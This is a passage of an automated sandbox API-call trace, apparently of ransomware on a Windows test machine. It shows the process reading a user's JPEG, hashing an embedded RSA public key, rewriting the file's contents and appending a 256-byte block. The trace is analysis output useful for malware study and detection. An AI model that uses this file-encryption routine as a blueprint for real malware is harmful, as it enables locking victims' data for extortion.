ftLastAccessTime.dwHighDateTime=0x1d89fd2, ftLastWriteTime.dwLowDateTime=0x2d1be120, ftLastWriteTime.dwHighDateTime=0x1d89fd2, nFileSizeHigh=0x0, nFileSizeLow=0x9e1b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3UVY.jpg", cAlternateFileName="")) returned 1 [0190.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af2fa0 [0190.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0190.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2fa0 | out: hHeap=0x2c0000) returned 1 [0190.149] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\3UVY.jpg") returned=".jpg" [0190.149] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\3UVY.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\3uvy.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.150] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=40475) returned 1 [0190.150] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.153] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9df5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.153] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.156] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.156] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x9e1b, lpOverlapped=0x0) returned 1 [0190.157] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.157] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.157] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.157] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.158] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.158] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.158] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.158] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.158] GetLastError () returned 0x0 [0190.159] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.159] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.159] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.159] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.159] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9e20) returned 0x2af5168 [0190.160] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af2fa0 [0190.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbc8 [0190.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af2fe8 [0190.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbe0 [0190.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc10 [0190.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc70 [0190.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc28 [0190.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.161] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc70 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc28 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dc10 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0190.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.164] GetCurrentThreadId () returned 0x5d8 [0190.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae49f8 [0190.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.164] GetCurrentThreadId () returned 0x5d8 [0190.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc70 [0190.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc10 [0190.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc28 [0190.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbf8 [0190.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc88 [0190.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0190.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc58 [0190.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc40 [0190.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dca0 [0190.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0190.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc40 [0190.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0190.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc10 [0190.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0190.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0190.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0190.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0190.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0190.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2fe8 | out: hHeap=0x2c0000) returned 1 [0190.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.176] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x9e16, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x9e16, lpOverlapped=0x0) returned 1 [0190.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.177] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9e1b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.177] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: 